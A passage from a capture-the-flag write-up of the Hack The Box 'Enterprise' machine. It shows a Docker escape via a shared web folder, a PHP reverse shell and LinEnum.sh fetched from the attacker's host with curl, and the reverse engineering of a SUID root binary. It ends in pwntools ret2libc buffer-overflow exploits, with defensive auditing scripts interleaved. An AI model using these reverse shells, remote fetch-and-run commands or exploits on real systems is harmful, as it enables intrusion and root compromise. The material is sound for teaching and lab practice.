cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)
proc on /proc/bus type proc (ro,relatime)
proc on /proc/fs type proc (ro,relatime)
proc on /proc/irq type proc (ro,relatime)
proc on /proc/sys type proc (ro,relatime)
proc on /proc/sysrq-trigger type proc (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
We didn't find anything interesting except /var/www/html/files: this folder is mounted from the host file system.
www-data@a7018bfdc454:/var/www/html/files$ ls -ltr
ls -ltr
total 4
-rw-r--r-- 1 root root 1406 Oct 17  2017 lcars.zip
But that file is already known to us.
If we add a file to this folder, it is added to the host web server too.
www-data@a7018bfdc454:/var/www/html/files$ echo "<?php phpinfo(); ?>" > u505.php
<www/html/files$ echo "<?php phpinfo(); ?>" > u505.php
And the file is interpreted by the host.
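The mount list is where this escape route shows up: every line whose source is a host block device and whose options include rw is a path the container can write to the host through. As an added example (not part of the write-up), the script below parses `mount -l` output and flags such mounts, treating the three files Docker always bind-mounts (/etc/hosts, /etc/hostname, /etc/resolv.conf) as expected; the sample is a constructed subset of the mount output shown above.

```python
"""Parse `mount -l` output from inside a container and flag writable mount
points backed by a host block device.  Added example; MOUNT_OUTPUT is a
constructed subset of the listing shown above."""
import re

MOUNT_OUTPUT = """\
none on / type aufs (rw,relatime,si=dd348e9525d0350e,dio,dirperm1)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)
proc on /proc/sys type proc (ro,relatime)
"""

# "<source> on <target> type <fstype> (<opt>,<opt>,...)"
MOUNT_RE = re.compile(
    r"^(?P<src>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$"
)

# Docker bind-mounts these from the host for every container; they are expected.
EXPECTED_HOST_FILES = {"/etc/resolv.conf", "/etc/hostname", "/etc/hosts"}


def parse_mounts(text):
    """Return one dict per mount line: src, target, fstype and a list of options."""
    entries = []
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["opts"] = entry["opts"].split(",")
            entries.append(entry)
    return entries


def host_backed_writable(entries):
    """Targets whose source is a host block device, mounted rw, and which are
    not one of the per-container files Docker always provides."""
    flagged = []
    for e in entries:
        if (e["src"].startswith("/dev/")
                and "rw" in e["opts"]
                and e["target"] not in EXPECTED_HOST_FILES):
            flagged.append(e["target"])
    return flagged


if __name__ == "__main__":
    for target in host_backed_writable(parse_mounts(MOUNT_OUTPUT)):
        print("writable host-backed mount:", target)
```

On this box the check singles out /var/www/html and /var/www/html/files, the second of which is also served by the host's Apache, so anything written there runs with the host's PHP.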
Host reverse shell
u505@kali:~$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
We create the reverse shell file.
u505@kali:~/HTB/Machines/Enterprise$ mkdir www
u505@kali:~/HTB/Machines/Enterprise$ cp php-reverse-shell.php www
u505@kali:~/HTB/Machines/Enterprise$ cd www/
u505@kali:~/HTB/Machines/Enterprise/www$ mv php-reverse-shell.php reverse.php
u505@kali:~/HTB/Machines/Enterprise/www$ vi reverse.php
u505@kali:~/HTB/Machines/Enterprise/www$ grep CHANGE reverse.php
$ip = '10.10.14.16';  // CHANGE THIS
$port = 4446;       // CHANGE THIS
u505@kali:~/HTB/Machines/Enterprise/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the Joomla reverse shell, we download the file.
www-data@a7018bfdc454:/var/www/html/files$ wget http://10.10.14.16/reverse.php
<www/html/files$ wget http://10.10.14.16/reverse.php
bash: wget: command not found
www-data@a7018bfdc454:/var/www/html/files$ curl http://10.10.14.16/reverse.php -o reverse.php
<www/html/files$ curl http://10.10.14.16/reverse.php -o reverse.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5493  100  5493    0     0  71842      0 --:--:-- --:--:-- --:--:-- 72276
We call the reverse shell.
u505@kali:~/HTB/Machines/Enterprise/www$ curl -k https://enterprise.local/files/reverse.php
And our listener responds.
u505@kali:~$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.61.
Ncat: Connection from 10.10.10.61:48908.
Linux enterprise.htb 4.10.0-37-generic #41-Ubuntu SMP Fri Oct 6 20:20:37 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 02:46:01 up  4:38,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@enterprise:/$ stty raw -echo
stty raw -echo
[1]+  Stopped                 rlwrap nc -lnvp 4446
u505@kali:~$ stty
speed 38400 baud; line = 0;
-brkint -imaxbel iutf8
u505@kali:~$ stty -a
speed 38400 baud; rows 67; columns 237; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
u505@kali:~$ fg
rlwrap nc -lnvp 4446
www-data@enterprise:/$ stty rows 67 columns 237
User flag
As user www-data, we are able to read the user flag.
www-data@enterprise:/$ ls -l /home/jeanlucpicard/user.txt
-r--r--r-- 1 jeanlucpicard jeanlucpicard 33 Sep  8  2017 /home/jeanlucpicard/user.txt
www-data@enterprise:/$ cat /home/jeanlucpicard/user.txt
<USER_FLAG>
Privilege escalation
www-data@enterprise:/$ curl http://10.10.14.16/LinEnum.sh | bash
...
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:5355            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:32812           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::5355                 :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::8080                 :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::443                  :::*                    LISTEN      -
...
[-] Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/
defaults {
# Please note that you need a log_type line to be able to use log_on_success # and log_on_failure. The default is the following : # log_type = SYSLOG daemon info
}
includedir /etc/xinetd.d
[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:
total 32
drwxr-xr-x  2 root root 4096 Sep  9  2017 .
drwxr-xr-x 95 root root 4096 May 21 22:21 ..
-rw-r--r--  1 root root  640 Nov  3  2016 chargen
-rw-r--r--  1 root root  502 Nov  3  2016 daytime
-rw-r--r--  1 root root  391 Nov  3  2016 discard
-rw-r--r--  1 root root  422 Nov  3  2016 echo
-rw-r--r--  1 root root  154 Sep  9  2017 lcars
-rw-r--r--  1 root root  569 Nov  3  2016 time
...
[-] SUID files:
...
-rwsr-xr-x 1 root root 38984 May 18  2017 /bin/mount
-rwsr-xr-x 1 root root 12152 Sep  8  2017 /bin/lcars
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
And if we take a look at the /etc/xinetd.d/lcars config file:
www-data@enterprise:/$ cat /etc/xinetd.d/lcars
service lcars
{
    type        = UNLISTED
    protocol    = tcp
    socket_type = stream
    port        = 32812
    wait        = no
    server      = /bin/lcars
    user        = root
}
xinetd runs as root.
www-data@enterprise:/$ ps -ef | grep xinet
root      1619     1  0 May21 ?        00:00:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
www-data 56652 56541  0 03:35 pts/1    00:00:00 grep xinet
ASLR is disabled on the target.
www-data@enterprise:/etc/xinetd.d$ cat /proc/sys/kernel/randomize_va_space
0
www-data@enterprise:/etc/xinetd.d$ ldd /bin/lcars
	linux-gate.so.1 =>  (0xf7ffc000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7e32000)
	/lib/ld-linux.so.2 (0x56555000)
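The combination that matters here is a custom xinetd service (type = UNLISTED, a non-standard port) whose server binary runs as user = root, on top of the binary itself being SUID root. As an added example (not part of the write-up), the script below parses xinetd service definitions and flags every enabled service that hands an external binary to root; the lcars entry is the one shown above, the echo entry is a constructed stock-style service for contrast.

```python
"""Parse xinetd service definitions and flag services that run an external
binary as root.  Added example; the lcars config is the file shown above,
the echo entry is constructed for contrast."""
import re

XINETD_CONFIGS = {
    "/etc/xinetd.d/lcars": """\
service lcars
{
    type        = UNLISTED
    protocol    = tcp
    socket_type = stream
    port        = 32812
    wait        = no
    server      = /bin/lcars
    user        = root
}
""",
    "/etc/xinetd.d/echo": """\
# constructed example: a disabled, internal stock service
service echo
{
    disable     = yes
    type        = INTERNAL
    socket_type = stream
    protocol    = tcp
    user        = root
    wait        = no
}
""",
}

# "service <name> { attr = value ... }"; DOTALL so the body spans lines.
SERVICE_RE = re.compile(r"service\s+(\S+)\s*\{(.*?)\}", re.DOTALL)


def parse_xinetd(text):
    """Return {service_name: {attribute: value}} for every service block."""
    services = {}
    for name, body in SERVICE_RE.findall(text):
        attrs = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()   # drop comments
            if "=" in line:
                key, value = line.split("=", 1)
                attrs[key.strip()] = value.strip()
        services[name] = attrs
    return services


def risky_services(configs):
    """(path, name, server, port) for every enabled service that runs an
    external server binary as root."""
    risky = []
    for path, text in configs.items():
        for name, attrs in parse_xinetd(text).items():
            enabled = attrs.get("disable", "no").lower() != "yes"
            external = "server" in attrs and attrs.get("type", "").upper() != "INTERNAL"
            if enabled and external and attrs.get("user") == "root":
                risky.append((path, name, attrs["server"], attrs.get("port", "?")))
    return risky


if __name__ == "__main__":
    for path, name, server, port in risky_services(XINETD_CONFIGS):
        print("%s: service %s runs %s as root on port %s" % (path, name, server, port))
```

Running the check over a real /etc/xinetd.d means reading each file into the dict; the parser is deliberately tolerant of the key/value spacing xinetd accepts. The fix on the defending side is the obvious one: a dedicated low-privilege user in the service definition, and no SUID bit on the binary.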
Program analysis
www-data@enterprise:/$ scp /bin/lcars u505@10.10.14.16:/home/u505/HTB/Machines/Enterprise/lcarsprg
Could not create directory '/var/www/.ssh'.
The authenticity of host '10.10.14.16 (10.10.14.16)' can't be established.
ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
u505@10.10.14.16's password:
lcars                                         100%   12KB 299.8KB/s   00:00
Decompilation:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
undefined4 main(undefined1 param_1)
{
  char local_19 [9];
  undefined1 *local_10;

  local_10 = &param_1;
  setresuid(0,0,0);
  startScreen();
  puts("Enter Bridge Access Code: ");
  fflush(stdout);
  fgets(local_19,9,stdin);
  bridgeAuth(local_19);
  return 0;
}
The main function calls startScreen and bridgeAuth.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void startScreen(void)
{
  puts("");
  puts(" _______ _______ ______ _______");
  puts(" | | |_____| |_____/ |______");
  puts(" |_____ |_____ | | | \\_ ______|");
  puts("");
  puts("Welcome to the Library Computer Access and Retrieval System\n");
  return;
}
The function startScreen shows a banner.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void bridgeAuth(char *param_1)
{
  char local_32;
  undefined uStack49;
  undefined uStack48;
  undefined uStack47;
  undefined uStack46;
  undefined uStack45;
  undefined uStack44;
  undefined uStack43;
  undefined uStack42;
  int local_14;
  undefined4 local_10;

  local_32 = 'p';
  uStack49 = 0x69;
  uStack48 = 99;
  uStack47 = 0x61;
  uStack46 = 0x72;
  uStack45 = 100;
  uStack44 = 0x61;
  uStack43 = 0x31;
  local_10 = 9;
  uStack42 = 0;
  local_14 = strcmp(param_1,&local_32);
  if (local_14 == 0) {
    main_menu();
  }
  else {
    puts("\nInvalid Code\nTerminating Console\n");
  }
  fflush(stdout);
                    /* WARNING: Subroutine does not return */
  exit(0);
}
If the input code is correct, the main menu is shown.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void main_menu(void)
{
  uint local_d8 [52];

  local_d8[0] = 0;
  startScreen();
  puts("\n");
  puts("LCARS Bridge Secondary Controls -- Main Menu: \n");
  puts("1. Navigation");
  puts("2. Ships Log");
  puts("3. Science");
  puts("4. Security");
  puts("5. StellaCartography");
  puts("6. Engineering");
  puts("7. Exit");
  puts("Waiting for input: ");
  fflush(stdout);
  __isoc99_scanf(&DAT_00010f92,local_d8);
  if (local_d8[0] < 8) {
                    /* WARNING: Could not recover jumptable at 0x0001097e. Too many branches */
                    /* WARNING: Treating indirect jump as call */
    (*(code *)((int)&_GLOBAL_OFFSET_TABLE_ + *(int *)(&DAT_000110c4 + local_d8[0] * 4)))();
    return;
  }
  unable();
  return;
}
The decompiler is not able to follow the control flow through the jump table, but there are only two more functions.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void unable(void)
{
  puts("\nSecondary Routines not implemented\nTerminating Console\n");
  fflush(stdout);
  return;
}
This function does nothing beyond printing a message.
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
void disableForcefields(void)
{
  undefined local_d4 [204];

  startScreen();
  puts("Disable Security Force Fields");
  puts("Enter Security Override:");
  fflush(stdout);
  __isoc99_scanf(&DAT_00010ec4,local_d4);
  printf("Rerouting Tertiary EPS Junctions: %s",local_d4);
  return;
}
The likelihood of a buffer overflow in this function is very high: the local buffer is 204 bytes long, scanf reads into it with no length limit or validation, and the value is then printed back from the possibly overflowed buffer.
Find the access code
We run the program with its library calls traced.
u505@kali:~/HTB/Machines/Enterprise$ ltrace ./lcarsprg
__libc_start_main(0x565aec91, 1, 0xff881854, 0x565aed30 <unfinished ...>
setresuid(0, 0, 0, 0x565aeca8)                                   = 0xffffffff
puts(""
)                                                                = 1
puts(" _______ _______"... _______ _______ ______ _______
)                                                                = 49
puts(" | | |_____|"... | | |_____| |_____/ |______
)                                                                = 49
puts(" |_____ |_____ | |"... |_____ |_____ | | | \_ ______|
)                                                                = 49
puts(""
)                                                                = 1
puts("Welcome to the Library Computer "...Welcome to the Library Computer Access and Retrieval System
)                                                                = 61
puts("Enter Bridge Access Code: "Enter Bridge Access Code:
)                                                                = 27
fflush(0xf7eefd20)                                               = 0
fgets(123456789
"12345678", 9, 0xf7eef580)                                       = 0xff881797
strcmp("12345678", "picarda1")                                   = -1
puts("\nInvalid Code\nTerminating Consol"...
Invalid Code
Terminating Console

)                                                                = 35
fflush(0xf7eefd20)                                               = 0
exit(0 <no return ...>
+++ exited (status 0) +++
The access code is picarda1.
Disable ASLR locally
The target machine has ASLR disabled, so we disable it on our machine too, to work under similar conditions.
u505@kali:~/HTB/Machines/Enterprise$ sudo sysctl kernel.randomize_va_space=0
[sudo] password for u505:
kernel.randomize_va_space = 0
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : ENABLED
RELRO     : Partial
u505@kali:~/HTB/Machines/Enterprise$ sudo chown root lcarsprg
u505@kali:~/HTB/Machines/Enterprise$ sudo chmod 4755 lcarsprg
Offset overflow determination
gdb-peda$ pattern create 300
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%'
gdb-peda$ r
Starting program: /opt/HTB/Machines/Enterprise/lcarsprg
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
Enter Bridge Access Code: picarda1
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
LCARS Bridge Secondary Controls -- Main Menu:
1. Navigation
2. Ships Log
3. Science
4. Security
5. StellaCartography
6. Engineering
7. Exit
Waiting for input:
4
Disable Security Force Fields
Enter Security Override:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x14e
EBX: 0x73254125 ('%A%s')
ECX: 0x0
EDX: 0x56555eec --> 0xa00 ()
ESI: 0xf7f9f000 --> 0x1dfd6c
EDI: 0xf7f9f000 --> 0x1dfd6c
EBP: 0x41422541 ('A%BA')
ESP: 0xffffd500 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
EIP: 0x25412425 ('%$A%')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x25412425
[------------------------------------stack-------------------------------------]
0000| 0xffffd500 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0004| 0xffffd504 ("A%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0008| 0xffffd508 ("%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0012| 0xffffd50c ("DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0016| 0xffffd510 ("A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0020| 0xffffd514 ("%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0024| 0xffffd518 ("aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
0028| 0xffffd51c ("A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x25412425 in ?? ()
gdb-peda$ pattern offset 0x25412425
625026085 found at offset: 212
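What `pattern create` and `pattern offset` do is generic: build a string in which every 4-byte window is unique, let the unbounded scanf in disableForcefields copy it over the 204-byte buffer and the saved registers, and look up the 4 bytes that landed in EIP. The script below is an added example (not from the write-up) implementing that method against a model of the vulnerable frame. It assumes a pwntools-style lowercase de Bruijn alphabet, so the bytes differ from PEDA's pattern on the page, and it assumes a frame where the 204-byte buffer is followed by 8 bytes before the saved return address, which is what the offset of 212 found above implies.

```python
"""Cyclic-pattern offset finding (the method behind PEDA's `pattern create`
and `pattern offset`) against a model of the disableForcefields frame.
Added example; the alphabet and the frame layout are assumptions stated in
the comments."""
import itertools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # assumption: pwntools-style alphabet
WIDTH = 4          # 32-bit x86: EIP receives 4 pattern bytes
BUF_SIZE = 204     # local_d4 in disableForcefields
PAD_TO_RET = 8     # assumed gap between buffer end and saved EIP (gives offset 212)


def de_bruijn(alphabet=ALPHABET, n=WIDTH):
    """Yield a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length):
    """Equivalent of `pattern create <length>`."""
    return bytes(itertools.islice(de_bruijn(), length))


def pattern_offset(value, length=300):
    """Equivalent of `pattern offset <value>`.  `value` is the EIP value as an
    int (little-endian, as read from the register dump) or as raw bytes.
    Returns -1 when the value does not come from the pattern."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern_create(length).find(needle)


def simulate_crash(payload):
    """Model the overflowed frame: return the 4 bytes `ret` pops into EIP, or
    None if the payload is too short to reach the saved return address."""
    ret_off = BUF_SIZE + PAD_TO_RET
    if len(payload) < ret_off + WIDTH:
        return None
    return struct.unpack("<I", payload[ret_off:ret_off + WIDTH])[0]


if __name__ == "__main__":
    pat = pattern_create(300)
    eip = simulate_crash(pat)
    print("EIP after crash: 0x%08x -> offset %d" % (eip, pattern_offset(eip)))
```

The uniqueness of every 4-byte window is what makes the lookup unambiguous; a pattern built from a repeated short string would match at several offsets. The same two functions work for a real crash: feed the EIP value from the register dump to pattern_offset instead of the simulated one.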
To verify, we create a small exploit.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_deadc0de.py
#!/usr/bin/python
from pwn import *

junk = 'D'*212
eip = 0xdeadc0de
after = 'U'*8
accesscode = "picarda1\n4\n"

payload = accesscode + junk + p32(eip) + after
#print payload
file = open("payload","w")
file.write(payload)
file.close()
We create the payload.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_deadc0de.py
u505@kali:~/HTB/Machines/Enterprise$ xxd payload
00000000: 7069 6361 7264 6131 0a34 0a44 4444 4444  picarda1.4.DDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000030: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000040: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000050: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000060: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000070: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000080: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
00000090: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
000000a0: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
000000b0: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
000000c0: 4444 4444 4444 4444 4444 4444 4444 4444  DDDDDDDDDDDDDDDD
000000d0: 4444 4444 4444 4444 4444 4444 4444 44de  DDDDDDDDDDDDDDD.
000000e0: c0ad de55 5555 5555 5555 55              ...UUUUUUUU
And pass the payload to the program.
u505@kali:~/HTB/Machines/Enterprise$ ./lcarsprg < payload
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
Enter Bridge Access Code:
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
LCARS Bridge Secondary Controls -- Main Menu:
1. Navigation
2. Ships Log
3. Science
4. Security
5. StellaCartography
6. Engineering
7. Exit
Waiting for input:
Disable Security Force Fields
Enter Security Override:
Segmentation fault
u505@kali:~/HTB/Machines/Enterprise$ sudo tail -n 2 /var/log/syslog
[sudo] password for u505:
May 21 22:36:58 kali kernel: [30755.607815] lcarsprg[10545]: segfault at deadc0de ip 00000000deadc0de sp 00000000ff808a20 error 14 in libc-2.30.so[f7d20000+1de000]
May 21 22:36:58 kali kernel: [30755.607834] Code: Bad RIP value.
As expected, the program crashes with EIP set to 0xdeadc0de.
Local exploit
u505@kali:~/HTB/Machines/Enterprise$ ldd lcarsprg
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7dbb000)
/lib/ld-linux.so.2 (0xf7fd4000)
u505@kali:~/HTB/Machines/Enterprise$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
1533: 00044630 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
u505@kali:~/HTB/Machines/Enterprise$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
150: 000373a0 33 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.0
u505@kali:~/HTB/Machines/Enterprise$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
188406 /bin/sh
With the addresses of system, exit and /bin/sh, we build our exploit.
u505@kali:~/HTB/Machines/Enterprise$ cat exploit_local.py
#!/usr/bin/python
from pwn import *

junk = 'D'*212

process = process('./lcarsprg')

glibcbase=0xf7dbb000
systemoffs=0x00044630
exitoff=0x000373a0
binshoff=0x188406

systemaddr=glibcbase+systemoffs
exitaddr=glibcbase+exitoff
binshaddr=glibcbase+binshoff

log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

process.recvuntil('Enter Bridge Access Code:')
process.send('picarda1\n')
process.recvuntil('Waiting for input:')
process.send('4\n')
process.recvuntil('Enter Security Override:')
process.send(payload)
process.send('\n')
process.interactive()

#print payload
file = open("payload","w")
file.write(payload)
file.close()
We test it.
u505@kali:~/HTB/Machines/Enterprise$ python exploit_local.py
[+] Starting local process './lcarsprg': pid 8733
[*] systemaddr 0xf7dff630
[*] exitaddr 0xf7df23a0
[*] binshaddr 0xf7f43406
[*] Switching to interactive mode
